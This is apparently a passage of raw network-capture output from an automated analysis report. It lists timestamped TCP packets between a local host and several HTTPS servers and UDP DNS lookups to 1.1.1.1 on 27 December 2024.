                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.886353970 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.886358023 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.894489050 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.894583941 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.894588947 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.902802944 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.902852058 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.902857065 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.910769939 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.910897970 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.910902977 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.918891907 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.918940067 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.918943882 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.926625967 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.926668882 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.926672935 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.935029030 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.935117960 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.935122967 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.941056013 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.941102982 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.941109896 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.948828936 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.948879957 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.948884964 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.956758976 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.956877947 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.956882954 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.962928057 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.963038921 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.963042974 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.969675064 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.969727039 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.969732046 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.975509882 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.975552082 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.975555897 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.981439114 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.981492996 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.981498003 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.989972115 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.990020990 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.990025043 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.002815962 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.002865076 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.002873898 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.015219927 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.015412092 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.015417099 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.028707981 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.028760910 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.028767109 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.029761076 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.029812098 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.029817104 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.032080889 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.032130957 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.032135010 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.038386106 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.038434029 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.038439035 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.038739920 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.038805008 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.038944006 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.749119043 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.749166012 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.749244928 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.749424934 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.749439001 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.544692993 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.544982910 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.545012951 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.546004057 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.546060085 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.547023058 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.547081947 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.547175884 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.547183037 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:53.599843025 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.245158911 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.245217085 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.245254993 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.245296001 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.245313883 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.245337963 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.245361090 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.258415937 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.258476019 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.258538008 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.258546114 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.258583069 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.264609098 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.277002096 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.277945995 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.277951956 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.320689917 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.365130901 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.414442062 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.414457083 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.459206104 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.459322929 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.459477901 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.459487915 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.459528923 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.467008114 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.474392891 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.475522041 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.475537062 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.485513926 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.487632990 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.487647057 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.496366024 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.496411085 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.496417046 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.501913071 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.503896952 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.503902912 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.506908894 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.507898092 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.507903099 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.519644976 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.519691944 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.519697905 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.532258987 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.532303095 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.532309055 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.545032978 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.545078039 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.545089006 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.558325052 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.558376074 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.558382034 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.603923082 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.677860975 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.680433989 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.683641911 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.683670998 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.729063988 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.787975073 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.799171925 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.799222946 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.799381971 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.799396038 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.803909063 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.803914070 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.854170084 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918701887 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918773890 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918827057 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918864012 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918869972 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918879986 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918901920 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918925047 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918955088 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918988943 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918988943 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918996096 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919030905 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919035912 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919070959 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919075012 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919116020 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919157982 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919197083 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919197083 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919214010 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919245958 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919251919 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919281006 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919296980 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919347048 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919378042 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919384003 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919388056 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919416904 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919420958 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919476032 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919507980 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919538975 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919540882 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919545889 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919574976 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919583082 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919624090 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920165062 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920228004 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920255899 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920278072 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920281887 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920311928 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920316935 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920320988 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920350075 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920352936 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920382023 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920423985 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920460939 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920461893 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920469046 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920495033 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920520067 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920546055 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920555115 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920558929 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920722961 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920981884 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921046972 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921076059 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921118021 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921122074 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921161890 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921165943 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921211958 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921401024 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921408892 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921423912 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.336777925 CET44349747172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.336822987 CET44349747172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.336884022 CET49747443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.741130114 CET49747443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.741153955 CET44349747172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:32.964720011 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:33.084757090 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:33.085030079 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840086937 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840116024 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840164900 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840375900 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840395927 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621141911 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621422052 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621448994 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621783018 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.622128010 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.622191906 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.672178030 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:00.306236029 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:00.306276083 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:00.306324005 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:15.723989964 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:15.724020958 CET44349837172.217.21.36192.168.2.4

                                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.172112942 CET5739953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.312196016 CET53573991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.753480911 CET6253953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.896795034 CET53625391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.267769098 CET53616931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.290689945 CET53627071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.398426056 CET5073953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.398716927 CET4932753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.535466909 CET53493271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.552885056 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.556570053 CET53507391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.221868038 CET53634261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:48.359033108 CET53645741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.576178074 CET6433553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.576400042 CET5047453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.709765911 CET53535531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.713077068 CET53643351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.814459085 CET53504741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.568097115 CET6311353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.568245888 CET6259153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.705461025 CET53631131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.706034899 CET53625911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.879071951 CET53644661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:04.163192987 CET53494901.1.1.1192.168.2.4
